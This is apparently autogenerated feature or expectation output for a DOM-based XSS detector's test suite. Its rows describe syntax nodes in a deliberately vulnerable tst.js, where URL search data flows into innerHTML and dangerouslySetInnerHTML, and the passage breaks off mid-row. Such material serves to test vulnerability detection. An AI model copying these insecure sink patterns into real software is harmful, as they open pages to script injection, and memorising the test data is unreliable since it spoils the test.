autogenerated/Xss/DomBasedXss/tst.js:192:5:192:28 | exceptional return of getElem ... sName() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:28 | exceptional return of getElem ... sName() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:28 | exceptional return of getElem ... sName() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:28 | exceptional return of getElem ... sName() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:28 | getElem ... sName() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:28 | getElem ... sName() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:28 | getElem ... sName() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:28 | getElem ... sName() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:28 | getElem ... sName() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:31 | getElem ... me()[0] | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:31 | getElem ... me()[0] | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:31 | getElem ... me()[0] | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:31 | getElem ... me()[0] | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:31 | getElem ... me()[0] | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:41 | getElem ... nerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:41 | getElem ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:41 | getElem ... nerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:41 | getElem ... nerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:41 | getElem ... nerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:51 | getElem ... tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:51 | getElem ... tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:51 | getElem ... tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:51 | getElem ... tainted | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:192:5:192:51 | getElem ... tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:192:30:192:30 | 0 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:192:30:192:30 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:192:30:192:30 | 0 | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:192:30:192:30 | 0 | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:192:30:192:30 | 0 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:192:33:192:41 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:192:33:192:41 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:192:33:192:41 | innerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:192:33:192:41 | innerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:192:33:192:41 | innerHTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:192:45:192:51 | tainted | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:192:45:192:51 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:192:45:192:51 | tainted | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:192:45:192:51 | tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | | autogenerated/Xss/DomBasedXss/tst.js:192:45:192:51 | tainted | enclosingFunctionName | references | | autogenerated/Xss/DomBasedXss/tst.js:192:45:192:51 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:26 | getElem ... assName | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:26 | getElem ... assName | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:26 | getElem ... assName | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:26 | getElem ... assName | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:26 | getElem ... assName | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:28 | exceptional return of getElem ... sName() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:28 | exceptional return of getElem ... sName() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:28 | exceptional return of getElem ... sName() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:28 | exceptional return of getElem ... sName() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:28 | exceptional return of getElem ... sName() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:28 | getElem ... sName() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:28 | getElem ... sName() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:28 | getElem ... sName() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:28 | getElem ... sName() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:28 | getElem ... sName() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:33 | getElem ... ().item | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:33 | getElem ... ().item | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:33 | getElem ... ().item | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:33 | getElem ... ().item | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:33 | getElem ... ().item | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:35 | exceptional return of getElem ... .item() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:35 | exceptional return of getElem ... .item() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:35 | exceptional return of getElem ... .item() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:35 | exceptional return of getElem ... .item() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:35 | exceptional return of getElem ... .item() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:35 | getElem ... .item() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:35 | getElem ... .item() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:35 | getElem ... .item() | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:35 | getElem ... .item() | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:35 | getElem ... .item() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:45 | getElem ... nerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:45 | getElem ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:45 | getElem ... nerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:45 | getElem ... nerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:45 | getElem ... nerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:55 | getElem ... tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:55 | getElem ... tainted | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:55 | getElem ... tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:55 | getElem ... tainted | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:193:5:193:55 | getElem ... tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:193:30:193:33 | item | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:193:30:193:33 | item | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:193:30:193:33 | item | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:193:30:193:33 | item | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:193:30:193:33 | item | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:193:37:193:45 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:193:37:193:45 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:193:37:193:45 | innerHTML | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | +| autogenerated/Xss/DomBasedXss/tst.js:193:37:193:45 | innerHTML | enclosingFunctionName | references | +| autogenerated/Xss/DomBasedXss/tst.js:193:37:193:45 | innerHTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:193:49:193:55 | tainted | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:193:49:193:55 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:193:49:193:55 | tainted | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:193:49:193:55 | tainted | enclosingFunctionBody | tainted document location search document body innerHTML tainted document createElement innerHTML tainted createElement innerHTML tainted document 0 getElementsByClassName 0 innerHTML tainted getElementsByClassName 0 0 innerHTML tainted getElementsByClassName item innerHTML tainted | | autogenerated/Xss/DomBasedXss/tst.js:193:49:193:55 | tainted | enclosingFunctionName | references | | autogenerated/Xss/DomBasedXss/tst.js:193:49:193:55 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:196:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:196:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:196:0 | this | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:196:0 | this | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:196:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:196:1 | tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:196:1 | tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:196:1:196:1 | tainted | enclosingFunctionBody | tainted document location search React 